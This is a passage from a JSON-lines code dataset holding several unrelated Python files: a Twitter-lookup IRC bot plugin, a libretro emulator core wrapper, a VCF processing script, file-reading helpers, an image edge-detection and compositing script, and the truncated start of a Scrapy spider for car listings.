hashtags from trends.\n args[\"exclude\"] = \"hashtags\"\n # work with woeid. 1 is world, the default. can be set via input or via config.\n if optwoeid: # if we have an input location, lookup the woeid.\n if optwoeid.lower().startswith(\n \"world\"\n ): # looking for worldwide or some variation. (bypass)\n args[\"id\"] = 1 # \"World Wide\" is worldwide (odd bug) = 1.\n elif optwoeid.strip().isdigit():\n args[\"id\"] = optwoeid.strip()\n else: # looking for something else.\n woeid = self._woeid_lookup(optwoeid) # yahoo search for woeid.\n if (\n woeid\n ): # if we get a returned value, set it. otherwise default value.\n args[\"id\"] = woeid\n else: # location not found.\n irc.reply(\n \"ERROR: I could not lookup location: {0}. Try a different \"\n \"location.\".format(optwoeid)\n )\n return\n # now build our API call\n data = self.twitterApi.ApiCall(\"trends/place\", parameters=args)\n try:\n data = json.loads(data)\n except:\n irc.reply(\"ERROR: failed to lookup trends on Twitter: {0}\".format(data))\n return\n # now, before processing, check for errors:\n if \"errors\" in data:\n if data[\"errors\"][0][\"code\"] == 34: # 34 means location not found.\n irc.reply(\"ERROR: I do not have any trends for: {0}\".format(optwoeid))\n return\n else: # just return the message.\n errmsg = data[\"errors\"][0]\n irc.reply(\n \"ERROR: Could not load trends. ({0} {1})\".format(\n errmsg[\"code\"], errmsg[\"message\"]\n )\n )\n return\n # if no error here, we found trends. prepare string and output.\n location = data[0][\"locations\"][0][\"name\"]\n ttrends = \" | \".join([trend[\"name\"] for trend in data[0][\"trends\"]])\n irc.reply(\n \"Top Twitter Trends in {0} :: {1}\".format(self._bold(location), ttrends)\n )\n\n trends = wrap(trends, [getopts({\"exclude\": \"\"}), optional(\"text\")])\n\n def tsearch(self, irc, msg, args, optlist, optterm):\n \"\"\"[--num number] [--searchtype mixed|recent|popular] [--lang xx] [--nort] [--new] \n Searches Twitter for the and returns the most recent results.\n --num is number of results.\n --searchtype being recent, popular or mixed. Popular is the default.\n --new returns new messages since last search for in channel.\n Ex: --num 3 breaking news\n \"\"\"\n # enforce +voice or above to use command?\n if self.registryValue(\"requireVoiceOrAbove\", msg.args[0]): # should we check?\n if ircutils.isChannel(msg.args[0]): # are we in a channel?\n if not irc.state.channels[msg.args[0]].isVoicePlus(\n msg.nick\n ): # are they + or @?\n irc.error(\n \"ERROR: You have to be at least voiced to use the tsearch \"\n \"command in {0}.\".format(msg.args[0])\n )\n return\n # before we do anything, make sure we have a twitterApi object.\n if not self.twitterApi:\n irc.reply(\n \"ERROR: Twitter is not authorized. Please check logs before running \"\n \"this command.\"\n )\n return\n self.since_id.setdefault(msg.channel, {})\n self.since_id[msg.channel].setdefault(\"{0}\".format(optterm), None)\n new = False\n # default arguments.\n tsearchArgs = {\n \"include_entities\": \"false\",\n \"tweet_mode\": \"extended\",\n \"count\": self.registryValue(\"defaultSearchResults\", msg.args[0]),\n \"lang\": \"en\",\n \"q\": utils.web.urlquote(optterm),\n }\n # check input.\n if optlist:\n for (key, value) in optlist:\n if key == \"num\": # --num\n maxresults = self.registryValue(\"maxSearchResults\", msg.args[0])\n if not (\n 1 <= value <= maxresults\n ): # make sure it's between what we should output.\n irc.reply(\n \"ERROR: '{0}' is not a valid number of tweets. Range is \"\n \"between 1 and {1}.\".format(value, maxresults)\n )\n return\n else: # change number to output.\n tsearchArgs[\"count\"] = value\n if key == \"searchtype\": # getopts limits us here.\n tsearchArgs[\n \"result_type\"\n ] = value # limited by getopts to valid values.\n if key == \"lang\": # lang . Uses ISO-639 codes like 'en'\n tsearchArgs[\"lang\"] = value\n if key == \"new\" and self.since_id[msg.channel][\"{0}\".format(optterm)]:\n new = True\n tsearchArgs[\"since_id\"] = self.since_id[msg.channel][\n \"{0}\".format(optterm)\n ]\n if key == \"nort\":\n tsearchArgs[\"q\"] += \" -filter:retweets\"\n # now build our API call.\n data = self.twitterApi.ApiCall(\"search/tweets\", parameters=tsearchArgs)\n if not data:\n if not new:\n irc.reply(\n \"ERROR: Something went wrong trying to search Twitter. ({0})\"\n .format(data)\n )\n log.error(\"Tweety: ERROR trying to search Twitter: {0}\".format(data))\n return\n try:\n data = json.loads(data)\n except:\n if not new:\n irc.reply(\n \"ERROR: Something went wrong trying to search Twitter. ({0})\"\n .format(data)\n )\n log.error(\"Tweety: ERROR trying to search Twitter: {0}\".format(data))\n return\n # check the return data.\n results = data.get(\"statuses\") # data returned as a dict.\n if not results or len(results) == 0: # found nothing or length 0.\n if not new:\n irc.reply(\n \"ERROR: No Twitter Search results found for '{0}'\".format(optterm)\n )\n log.info(\n \"Tweety: No Twitter Search results found for '{0}': {1}\".format(\n optterm, data\n )\n )\n return\n else: # we found something.\n self.since_id[msg.channel][\"{0}\".format(optterm)] = results[0].get(\"id\")\n for result in results[0 : int(tsearchArgs[\"count\"])]: # iterate over each.\n nick = self._unescape(result[\"user\"].get(\"screen_name\"))\n name = self._unescape(result[\"user\"].get(\"name\"))\n verified = result[\"user\"].get(\"verified\")\n text = self._unescape(result.get(\"full_text\")) or self._unescape(\n result.get(\"text\")\n )\n date = self._time_created_at(result.get(\"created_at\"))\n tweetid = result.get(\"id_str\")\n # build output string and output.\n output = self._outputTweet(\n irc, msg, nick, name, verified, text, date, tweetid, None\n )\n irc.reply(output)\n\n tsearch = wrap(\n tsearch,\n [\n getopts(\n {\n \"num\": \"int\",\n \"searchtype\": (\"literal\", (\"popular\", \"mixed\", \"recent\")),\n \"lang\": \"somethingWithoutSpaces\",\n \"new\": \"\",\n \"nort\": \"\",\n }\n ),\n \"text\",\n ],\n )\n\n def twitter(self, irc, msg, args, optlist, optnick):\n \"\"\"[--noreply] [--nort] [--num <##>] [--info] [--new] [--id ] \n Returns last tweet or --num tweets. Shows all tweets, including RT and reply.\n To not display replies or RT's, use --noreply or --nort.\n Return new tweets since you last checked in channel with --new.\n Return specific tweet with --id .\n Return information on user with --info.\n Ex: --info CNN | --id 337197009729622016 | --num 3 CNN\n \"\"\"\n self.since_id.setdefault(msg.channel, {})\n self.since_id[msg.channel].setdefault(\"{0}\".format(optnick), None)\n # enforce +voice or above to use command?\n if self.registryValue(\"requireVoiceOrAbove\", msg.args[0]): # should we check?\n if ircutils.isChannel(msg.args[0]): # are we in a channel?\n if not irc.state.channels[msg.args[0]].isVoicePlus(\n msg.nick\n ): # are they + or @?\n irc.error(\n \"ERROR: You have to be at least voiced to use the twitter \"\n \"command in {0}.\".format(msg.args[0])\n )\n return\n # before we do anything, make sure we have a twitterApi object.\n if not self.twitterApi:\n irc.reply(\n \"ERROR: Twitter is not authorized. Please check logs before running \"\n \"this command.\"\n )\n return\n # now begin\n optnick = optnick.replace(\"@\", \"\") # strip @ from input if given.\n # default options.\n args = {\n \"id\": False,\n \"nort\": False,\n \"noreply\": False,\n \"url\": False,\n \"new\": False,\n \"num\": self.registryValue(\"defaultResults\", msg.args[0]),\n \"info\": False,\n }\n # handle input optlist.\n if optlist:\n for (key, value) in optlist:\n if key == \"id\":\n args[\"id\"] = True\n if key == \"url\":\n args[\"url\"] = True\n if key == \"nort\":\n args[\"nort\"] = True\n if key == \"noreply\":\n args[\"noreply\"] = True\n if key == \"new\":\n args[\"new\"] = True\n if key == \"num\":\n maxresults = self.registryValue(\"maxResults\", msg.args[0])\n if not (\n 1 <= value <= maxresults\n ): # make sure it's between what we should output.\n irc.reply(\n \"ERROR: '{0}' is not a valid number of tweets. Range is \"\n \"between 1 and {1}.\".format(value, maxresults)\n )\n return\n else: # number is valid so return this.\n args[\"num\"] = value\n if key == \"info\":\n args[\"info\"] = True\n # handle the four different rest api endpoint urls + twitterArgs dict for options.\n if args[\"id\"]: # -id #.\n apiUrl = \"statuses/show\"\n twitterArgs = {\n \"id\": optnick,\n \"include_entities\": \"false\",\n \"tweet_mode\": \"extended\",\n }\n elif args[\"info\"]: # --info.\n apiUrl = \"users/show\"\n twitterArgs = {\"screen_name\": optnick, \"include_entities\": \"false\"}\n elif args[\"new\"]: # --new.\n apiUrl = \"statuses/user_timeline\"\n if self.since_id[msg.channel][\"{0}\".format(optnick)]:\n twitterArgs = {\n \"screen_name\": optnick,\n \"since_id\": self.since_id[msg.channel][\"{0}\".format(optnick)],\n \"count\": args[\"num\"],\n \"tweet_mode\": \"extended\",\n }\n if args[\"nort\"]: # show retweets?\n twitterArgs[\"include_rts\"] = \"false\"\n else: # default is to show retweets.\n twitterArgs[\"include_rts\"] = \"true\"\n if args[\"noreply\"]: # show replies?\n twitterArgs[\"exclude_replies\"] = \"true\"\n else: # default is to NOT exclude replies.\n twitterArgs[\"exclude_replies\"] = \"false\"\n else:\n twitterArgs = {\n \"screen_name\": optnick,\n \"count\": args[\"num\"],\n \"tweet_mode\": \"extended\",\n }\n if args[\"nort\"]: # show retweets?\n twitterArgs[\"include_rts\"] = \"false\"\n else: # default is to show retweets.\n twitterArgs[\"include_rts\"] = \"true\"\n if args[\"noreply\"]: # show replies?\n twitterArgs[\"exclude_replies\"] = \"true\"\n else: # default is to NOT exclude replies.\n twitterArgs[\"exclude_replies\"] = \"false\"\n else: # if not an --id --info, or --new we're printing from their timeline.\n apiUrl = \"statuses/user_timeline\"\n twitterArgs = {\n \"screen_name\": optnick,\n \"count\": args[\"num\"],\n \"tweet_mode\": \"extended\",\n }\n if args[\"nort\"]: # show retweets?\n twitterArgs[\"include_rts\"] = \"false\"\n else: # default is to show retweets.\n twitterArgs[\"include_rts\"] = \"true\"\n if args[\"noreply\"]: # show replies?\n twitterArgs[\"exclude_replies\"] = \"true\"\n else: # default is to NOT exclude replies.\n twitterArgs[\"exclude_replies\"] = \"false\"\n # call the Twitter API with our data.\n data = self.twitterApi.ApiCall(apiUrl, parameters=twitterArgs)\n if not data:\n if not args[\"new\"]:\n irc.reply(\n \"ERROR: Failed to lookup Twitter for '{0}' ({1})\".format(\n optnick, data\n )\n )\n log.error: \"Tweety: ERROR looking up Twitter for '{0}': {1}\".format(\n optnick, data\n )\n return\n try:\n data = json.loads(data)\n except:\n if not args[\"new\"]:\n irc.reply(\n \"ERROR: Failed to lookup Twitter for '{0}' ({1})\".format(\n optnick, data\n )\n )\n log.error: \"Tweety: ERROR looking up Twitter for '{0}': {1}\".format(\n optnick, data\n )\n return\n # before anything, check for errors. errmsg is conditional.\n if \"errors\" in data:\n if data[\"errors\"][0][\"code\"] == 34: # not found.\n if args[\"id\"]: # --id #. # is not found.\n errmsg = \"ERROR: Tweet ID '{0}' not found.\".format(optnick)\n else: # --info or twitter not found.\n errmsg = \"ERROR: Twitter user '{0}' not found.\".format(optnick)\n irc.reply(errmsg) # print the error and exit.\n return\n else: # errmsg is not 34. just return it.\n errmsg = data[\"errors\"][0]\n if not args[\"new\"]:\n irc.reply(\n \"ERROR: {0} {1}\".format(errmsg[\"code\"], errmsg[\"message\"])\n )\n log.error(\n \"Tweety: ERROR: {0}: {1}\".format(errmsg[\"code\"], errmsg[\"message\"])\n )\n return\n # no errors, so we process data conditionally.\n if args[\"id\"]: # If --id was given for a single tweet.\n text = self._unescape(data.get(\"full_text\")) or self._unescape(\n data.get(\"text\")\n )\n nick = self._unescape(data[\"user\"].get(\"screen_name\"))\n name = self._unescape(data[\"user\"].get(\"name\"))\n verified = data[\"user\"].get(\"verified\")\n relativeTime = self._time_created_at(data.get(\"created_at\"))\n tweetid = data.get(\"id\")\n if data.get(\"retweeted_status\"):\n retweetid = data[\"retweeted_status\"].get(\"id\")\n else:\n retweetid = None\n # prepare string to output and send to irc.\n output = self._outputTweet(\n irc, msg, nick, name, verified, text, relativeTime, tweetid, retweetid\n )\n irc.reply(output)\n return\n elif args[\"info\"]: # --info to return info on a Twitter user.\n location = data.get(\"location\")\n followers = data.get(\"followers_count\")\n friends = data.get(\"friends_count\")\n description = self._unescape(data.get(\"description\"))\n screen_name = self._unescape(data.get(\"screen_name\"))\n created_at = data.get(\"created_at\")\n statuses_count = data.get(\"statuses_count\")\n protected = data.get(\"protected\")\n name = self._unescape(data.get(\"name\"))\n url = data.get(\"url\")\n # build output string conditionally. build string conditionally.\n ret = self._bu(\"@{0}\".format(screen_name))\n ret += \" ({0})\".format(name)\n if protected: # is the account protected/locked?\n ret += \" [{0}]:\".format(self._bu(\"LOCKED\"))\n else: # open.\n ret += \":\"\n if url: # do they have a url?\n ret += \" {0}\".format(self._ul(url))\n if description: # a description?\n ret += \" {0}\".format(self._unescape(description))\n ret += \" [{0} friends,\".format(self._bold(friends))\n ret += \" {0} tweets,\".format(self._bold(statuses_count))\n ret += \" {0} followers,\".format(self._bold(followers))\n ret += \" signup: {0}\".format(self._bold(self._time_created_at(created_at)))\n if location: # do we have location?\n ret += \" Location: {0}]\".format(self._bold(location))\n else: # nope.\n ret += \"]\"\n # finally, output.\n irc.reply(ret)\n return\n else: # this will display tweets/a user's timeline. can be n+1 tweets.\n if len(data) == 0: # no tweets found.\n if not args[\"new\"]:\n irc.reply(\"ERROR: '{0}' has not tweeted yet.\".format(optnick))\n log.info(\"Tweety: '{0}' has not tweeted yet.\".format(optnick))\n return\n self.since_id[msg.channel][\"{0}\".format(optnick)] = data[0].get(\"id\")\n for tweet in data: # n+1 tweets found. iterate through each tweet.\n text = self._unescape(tweet.get(\"full_text\")) or self._unescape(\n tweet.get(\"text\")\n )\n nick = self._unescape(tweet[\"user\"].get(\"screen_name\"))\n name = self._unescape(tweet[\"user\"].get(\"name\"))\n verified = tweet[\"user\"].get(\"verified\")\n tweetid = tweet.get(\"id\")\n if tweet.get(\"retweeted_status\"):\n retweetid = tweet[\"retweeted_status\"].get(\"id\")\n else:\n retweetid = None\n relativeTime = self._time_created_at(tweet.get(\"created_at\"))\n # prepare string to output and send to irc.\n output = self._outputTweet(\n irc,\n msg,\n nick,\n name,\n verified,\n text,\n relativeTime,\n tweetid,\n retweetid,\n )\n irc.reply(output)\n\n twitter = wrap(\n twitter,\n [\n getopts(\n {\n \"noreply\": \"\",\n \"nort\": \"\",\n \"info\": \"\",\n \"id\": \"\",\n \"url\": \"\",\n \"new\": \"\",\n \"num\": \"int\",\n }\n ),\n \"somethingWithoutSpaces\",\n ],\n )\n\n\nClass = Tweety\n\n\n# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=279:\n","sub_path":"Tweety/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":37592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"5594102","text":"'''\nfile: coreimpl.py\nauthor: Mike Young\n'''\n\nimport traceback\nimport ctypes\n\nfrom yg.handlers import HANDLER_MGR\nfrom entities.enums import LogLevel, PollType, RetroApi\nfrom entities.retrocore import RetroCore\nfrom entities.retrotypes import retro_video_refresh_t, \\\n retro_audio_sample_t, \\\n retro_audio_sample_batch_t, \\\n retro_input_state_t, \\\n retro_void_t\nfrom entities.structs import RetroSystemAvInfo\nfrom yg import logger\nfrom yg.utils import file_data_to_ctypes\nfrom libretromacros import RETRO_MACROS\n\n\nclass CoreImpl:\n ''' Based on RetroArch/core_impl.c '''\n _logger = logger\n\n def __init__(self, core):\n self.video_handler = HANDLER_MGR.video_handler\n self.audio_handler = HANDLER_MGR.audio_handler\n self.input_handler = HANDLER_MGR.input_handler\n\n self.api_version = RETRO_MACROS.RETRO_API_VERSION\n\n self.retro_ctx = {\n 'video_cb': None,\n 'audio_cb': None,\n 'audio_batch_cb': None,\n 'state_cb': None,\n 'poll_cb': None\n }\n self._current_core = RetroCore(core)\n\n def load(self, poll_type_behavior):\n self._current_core.poll_type = poll_type_behavior\n\n if not self.core_verify_api_version():\n return False\n if not self._init_libretro_cbs():\n return False\n\n self.core_get_system_av_info(self.video_handler.av_info)\n\n return True\n\n def core_get_system_info(self, retro_system_info):\n if not retro_system_info:\n return False\n self._current_core.retro_get_system_info(retro_system_info)\n return True\n\n def core_set_environment(self, retro_env):\n try:\n self._current_core.retro_set_environment(retro_env)\n return True\n except Exception as ex:\n self._logger.log(LogLevel.ERROR, traceback.format_exc())\n return False\n\n def core_init(self):\n self._current_core.retro_init()\n self._current_core.initialized = True\n\n def core_verify_api_version(self):\n core_api_version = self._current_core.retro_api_version()\n self._logger.log(LogLevel.INFO, 'Current core Libretro API version: %u' % core_api_version)\n self._logger.log(\n LogLevel.INFO,\n 'App compiled against Libretro API version: %u' % self.api_version\n )\n\n if core_api_version != self.api_version:\n self._logger.log(LogLevel.WARN, 'Libretro ABI break!')\n return False\n return True\n\n def core_load_game(self, game_info_ptr):\n try:\n self.game_info = game_info_ptr\n self._current_core.game_loaded = self._current_core.retro_load_game(game_info_ptr)\n return True\n except Exception as ex:\n self._logger.log(LogLevel.ERROR, traceback.format_exc())\n self._current_core.game_loaded = False\n return False\n\n\n def core_run(self):\n '''\n Poll and call retro_run\n RetroArch example included some netplay stuff which I excluded\n '''\n display = self.video_handler.current_driver.disp\n\n if self._current_core.poll_type == PollType.EARLY:\n self.input_handler.input_poll()\n elif self._current_core.poll_type == PollType.LATE:\n self._current_core.input_polled = False\n self._current_core.retro_run()\n\n if self._current_core.poll_type == PollType.LATE and not self._current_core.input_polled:\n self.input_handler.input_poll()\n\n def core_get_system_av_info(self, av_info):\n if not av_info:\n return False\n addr = ctypes.addressof(av_info)\n av_info_ptr = ctypes.cast(addr, ctypes.POINTER(RetroSystemAvInfo))\n self._current_core.retro_get_system_av_info(av_info_ptr)\n return True\n\n def core_set_controller_port_device(self, pad_dict):\n if not pad_dict:\n return False\n self._current_core.retro_set_controller_port_device(pad_dict['port'], pad_dict['device'])\n return True\n\n def core_unload_game(self):\n try:\n # self.video_handler.free_hw_context()\n # self.audio_handler.stop()\n\n self._current_core.retro_unload_game()\n\n self._current_core.game_loaded = False\n return True\n except Exception as ex:\n self._logger.log(LogLevel.ERROR, traceback.format_exc())\n return False\n\n def core_unload(self):\n try:\n self._current_core.retro_deinit()\n return True\n except Exception as ex:\n self._logger.log(LogLevel.ERROR, traceback.format_exc())\n return False\n\n def set_has_input_descriptors(self):\n self._current_core.has_set_input_descriptors = True\n\n def input_state_poll(self, port, device, idx, key_id):\n if self._current_core.poll_type == PollType.LATE:\n if not self._current_core.input_polled:\n self.input_handler.input_poll()\n self._current_core.input_polled = True\n\n return self.input_handler.input_state(port, device, idx, key_id)\n\n def input_state_poll_maybe(self):\n if self._current_core.poll_type == PollType.NORMAL.value:\n self.input_handler.input_poll()\n\n def _init_libretro_cbs(self):\n try:\n video_refresh = retro_video_refresh_t()\n self._current_core.core.retro_set_video_refresh.argtypes = [video_refresh]\n self._current_core.core.retro_set_video_refresh.restype = None\n self.retro_ctx['video_cb'] = video_refresh(self.video_handler.render_frame)\n\n audio_sample = retro_audio_sample_t()\n self._current_core.core.retro_set_audio_sample.argtypes = [audio_sample]\n self._current_core.core.retro_set_audio_sample.restype = None\n self.retro_ctx['audio_cb'] = audio_sample(self.audio_handler.sample)\n\n audio_sample_batch = retro_audio_sample_batch_t()\n self._current_core.core.retro_set_audio_sample_batch.argtypes = [audio_sample_batch]\n self._current_core.core.retro_set_audio_sample_batch.restype = ctypes.c_size_t\n self.retro_ctx['audio_batch_cb'] = audio_sample_batch(self.audio_handler.sample_batch)\n\n input_state = retro_input_state_t()\n self._current_core.core.retro_set_input_state.argtypes = [input_state]\n self._current_core.core.retro_set_input_state.restype = None\n self.retro_ctx['state_cb'] = input_state(self.input_state_poll)\n\n input_poll = retro_void_t()\n self._current_core.core.retro_set_input_poll.argtypes = [input_poll]\n self._current_core.core.retro_set_input_poll.restype = None\n self.retro_ctx['poll_cb'] = input_poll(self.input_state_poll_maybe)\n\n self._set_libretro_cbs()\n\n return True\n except Exception as ex:\n self._logger.log(LogLevel.ERROR, traceback.format_exc())\n return False\n\n def _set_libretro_cbs(self):\n self._current_core.retro_set_video_refresh(self.retro_ctx['video_cb'])\n self._current_core.retro_set_audio_sample(self.retro_ctx['audio_cb'])\n self._current_core.retro_set_audio_sample_batch(self.retro_ctx['audio_batch_cb'])\n self._current_core.retro_set_input_poll(self.retro_ctx['poll_cb'])\n self._current_core.retro_set_input_state(self.retro_ctx['state_cb'])\n","sub_path":"coreimpl.py","file_name":"coreimpl.py","file_ext":"py","file_size_in_byte":7557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"27410129","text":"import argparse\nimport pandas as pd\nimport csv\n\nparser = argparse.ArgumentParser(description='name')\nparser.add_argument('-n', dest='name', type=str, help=\"name of vcf file\")\n\n#name='final_SRR6463548_filtered.vcfext.vcf'\nargs = parser.parse_args()\nname=args.name\nname2='fixed'+name\nname3='fixedPOS'+name\n#name3='fixedPOS'+name[:-4]+'.csv'\n\n#print(pd.read_csv(name))\n\n#with open(name, mode='r') as f1:\n #print(f1.read())\n# Lines = f1.readlines() \n# for line in Lines: \n# print(len(line.split()), \"columns\")\n# baseCol=len(line.split())\n# break\n\n#with open(name, mode='r') as f1:\n #print(f1.read())\n# Lines = f1.readlines() \n# for line in Lines: \n# if len(line.split()) > baseCol\n\nwith open(name, mode='r') as f1:\n with open(name2, mode='w') as f2:\n #print(f1.read())\n Lines = f1.readlines() \n for line in Lines: \n f2.write(line)\n break\n\n\nwith open(name, mode='r') as f1:\n with open(name2, mode='a') as f2:\n #print(f1.read())\n Lines = f1.readlines()\n #testcount=0\n protein=\"\"\n for line in Lines: \n #testcount+=1\n count=0\n for word in line.split():\n if word.startswith(\"c.\"):\n count+=1\n if word.startswith(\"n.\"):\n count+=1\n if word.startswith(\"p.\"):\n protein=word\n #if protein in line: print(\"true\")\n for x in range((count)):\n count2=-1\n for word in line.split():\n if word.startswith(\"c.\") == False and word.startswith(\"n.\") == False:\n f2.write(word+\"\\t\")\n if word.startswith(\"c.\"):\n count2+=1\n if word.startswith(\"n.\"):\n count2+=1\n if x == count2 and protein in line:\n #print(x)\n if word.startswith(\"c.\"):\n f2.write(word+\"\\t\"+protein+\"\\n\")\n break\n if word.startswith(\"n.\"):\n f2.write(word+\"\\t\"+protein+\"\\n\")\n break\n if x == count2 and protein not in line:\n #print(x)\n if word.startswith(\"c.\"):\n f2.write(word+\"\\n\")\n break\n if word.startswith(\"n.\"):\n f2.write(word+\"\\n\")\n break\n #if testcount ==2:\n # break\n\n\n with open(name, mode='r') as f1:\n with open(name3, mode='w') as f3:\n #print(f1.read())\n Lines = f1.readlines() \n for line in Lines: \n f3.write(line)\n break\n\n with open(name2, mode='r') as f2:\n with open(name3, mode='a') as f3:\n #print(f1.read())\n Lines = f2.readlines()\n #testcount=0\n start=0\n for line in Lines: \n #testcount+=1\n start+=1\n tempword=\"\"\n tempcount=0\n count=0\n for word in line.split():\n tempcount+=1\n if word.startswith(\"c.\") and \"+\" not in word and \"-\" not in word:\n for character in word: \n if character.isdigit():\n tempword+=character\n if word.startswith(\"n.\") and \"+\" not in word and \"-\" not in word:\n for character in word: \n if character.isdigit():\n tempword+=character\n if word.startswith(\"c.\") and \"+\" in word or \"-\" in word:\n start=1\n if word.startswith(\"n.\") and \"+\" in word or \"-\" in word:\n start=1\n if start>1:\n for word in line.split():\n count+=1\n if count==2:\n f3.write(tempword+\"\\t\")\n if count!=2:\n if count == tempcount:\n f3.write(word+\"\\n\")\n else: f3.write(word+\"\\t\")\n","sub_path":"vcfcsv3.py","file_name":"vcfcsv3.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"152850364","text":"__author__ = 'Nik Sheridan'\n\n\nimport time\nimport pickle\n\n\ndef file_to_list_stripped(userfile):\n '''\n Opens, reads then closes file specified in \"userfile\" variable from filesystem\n Intended use case: TEXT\n Returns: outputList\n '''\n file = open(userfile)\n outputList = []\n filelist = file.readlines()\n file.close()\n for item in filelist:\n outputList.append(item.strip())\n return outputList\n\n\ndef file_to_list_stripped_and_split(userfile):\n '''\n Opens, reads then closes file specified in \"userfile\" variable from filesystem, and splits into nested lists\n Intended use case: Good for\n Returns: outputList\n '''\n file = open(userfile)\n outputList = []\n filelist = file.readlines()\n file.close()\n for item in filelist:\n #outputList.append(item.strip())\n split_item = item.split()\n outputList.append(split_item)\n return outputList\n\n\ndef file_to_list_stripped_right_only(userfile):\n '''\n :param userfile:\n :return: list from file without the crap on the right hand side\n Use case: Good for Cisco config file generation from templates (retains indentation on the left)\n '''\n file = open(userfile, 'r')\n config_lines_with_newline_ends = file.readlines()\n file.close()\n config_lines = []\n for line in config_lines_with_newline_ends:\n config_lines.append(line.rstrip())\n return config_lines\n\n\ndef suffix_timestamp(orig_name):\n '''\n Dependant on importing 'time' library\n Takes orig_name and adds a timestamp with a '.txt' extension\n Returns new_name\n '''\n new_name = orig_name + \".\" + time.strftime(\"%Y%m%d\") + \".txt\"\n return new_name\n\n\ndef list2pickled(index,list,picklefile):\n print('hello')\n\nclass networkInterface(object):\n\n def __init__(self, networkInterface):\n self.configItem = networkInterface\n\n\ndef main():\n my_list1 = file_to_list_stripped(\"..\\\\OfficeReference.txt\")\n my_list2 = file_to_list_stripped_and_split(\"C:\\\\Data\\\\Storage\\\\Coding\\\\referenceCodeNetworkUtilities\\\\OfficeReference.txt\")\n my_list3 = file_to_list_stripped_right_only(\"C:\\\\Data\\\\Storage\\\\Coding\\\\referenceCodeNetworkUtilities\\\\OfficeReference.txt\")\n print('Output from file_to_list_stripped method')\n print(my_list1)\n print('\\n')\n print('file_to_list_stripped_and_split')\n print(my_list2)\n print('\\n')\n print('file_to_list_stripped_right_only')\n print(my_list3)\n print('\\n')\n\n pickle.dump(my_list2,open( \"..\\\\OfficeReference.p\", \"wb\" ))\n my_list4 = pickle.load( open( \"..\\\\OfficeReference.p\", \"rb\" ) )\n\n print('This is the imported pickled list')\n print(my_list4)\n\n #object_list = []\n #for item in my_list:\n # object_list.append(networkInterface(item))\n # print(object_list)\n #\n #print(object_list[0].configItem)\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"ReferenceMethods/ReferenceMethodsV0002.py","file_name":"ReferenceMethodsV0002.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"461945686","text":"# from PIL import Image # To import an image.\nimport matplotlib.pyplot as plt # To display an image\nimport numpy # To manipulate matrices\nfrom scipy import misc # To load an image\nfrom copy import deepcopy\n#This is just a test # This is dump, Erin.\n\ndef display(image):\n plt.imshow(image)\n plt.show()\n\n\ndef edge_detection(image, threshold):\n edges = deepcopy(image)\n # Create white edge image.\n for i in range(len(image)):\n for j in range(len(image[0])):\n edges[i][j] = [255, 255, 255]\n\n for i in range(1, len(image) - 1):\n for j in range(1, len(image[0]) - 1):\n for k in [0]:\n\n diffs = []\n diffs.append(abs(image[i][j][k] - image[i - 1][j - 1][k]))\n diffs.append(abs(image[i][j][k] - image[i][j - 1][k]))\n diffs.append(abs(image[i][j][k] - image[i + 1][j - 1][k]))\n # diffs.append(abs(image[i][j][k] - image[i - 1][j - 1][k]))\n # diffs.append(abs(image[i][j][k] - image[i - 1][j][k]))\n\n add_edge = 0\n for diff in diffs:\n if diff > threshold:\n add_edge += 1\n\n # if add_edge == len(diffs):\n if abs(sum(diffs)) / len(diffs) > threshold:\n edges[i][j] = [0, 0, 0]\n display(image)\n display(edges)\n\n\ndef image_inverse(image):\n new_image = deepcopy(image)\n for i in range(len(image)):\n for j in range(len(image[0])):\n for k in range(3):\n new_image[i][j][k] = 255 - new_image[i][j][k]\n\n display(image)\n display(new_image)\n\n\ndef linear_combination(image1, image2, a=0.5):\n image1 *= a\n image2 *= (1 - a)\n comp = numpy.add(image1, image2)\n display(comp)\n\n\ndef composite(overlay, backgound):\n new_image = deepcopy(overlay)\n\n for i in range(len(overlay)):\n for j in range(len(overlay[0])):\n for k in range(3):\n if overlay[i][j][k] < 180:\n new_image[i][j][k] = overlay[i][j][k]\n else:\n new_image[i][j][k] = backgound[i][j][k]\n\n display(new_image)\n\n# Read in images.\ntoad = misc.imread(\"toad.jpg\")\nripon = misc.imread(\"ripon.jpg\")\nlamb = misc.imread(\"lamb.jpg\")\ntin = misc.imread(\"tin.jpg\")\nhair = misc.imread(\"hair.jpg\")\ndorothy = misc.imread(\"dorothy.png\")\n\n\n# Do edge detection\nedge_detection(ripon, 100)\n# edge_detection(tin, 250)\n\n# image_inverse(dorothy)\n\n#composite(hair, lamb)\n\n#linear_combination(lamb, hair, a=0.4)\n#display(hair)\n","sub_path":"images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"24151555","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport json, re\nfrom myproject.items import GuaziItem\n#导入深度爬虫包\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.contrib.linkextractors import LinkExtractor\n\n\nclass GuzziSpider(CrawlSpider):\n name = 'guazicrawl'\n\n start_urls = ['http://www.guazi.com/sjz/dazhong/']\n #只能匹配url\n rules = (\n # 提取匹配 页数的url 的链接并跟进链接(没有callback意味着follow默认为True)\n Rule(LinkExtractor(allow=('/sjz/dazhong/o\\d+/#bread',))),\n\n # 提取匹配点击大众车名进入详情页面的链接并使用spider的parse_item方法进行分析\n Rule(LinkExtractor(allow=('/sjz/\\w{17}\\.htm#fr_page=list&fr_pos=city&fr_no=\\d+',)), callback='parse_item'),\n )\n\n # 爬取详情页面具体的信息,标题、价格、里程、url\n def parse_item(self, response):\n guazi = GuaziItem() #需要在item内重新定义个类,并且写字段\n body = response.text.replace('\\n', '').replace('\\t', '').replace('\\r', '')\n title = re.findall('class=\"titlebox\">(.*?) 0:\n guazi[\"name\"] = title[0]\n price = re.findall('class=\"pricestype\">(.*?) 0:\n guazi[\"price\"] = price[0]\n licheng = re.findall('class=\"assort clearfix\">.*?\"two\">(.*?)', body)\n if 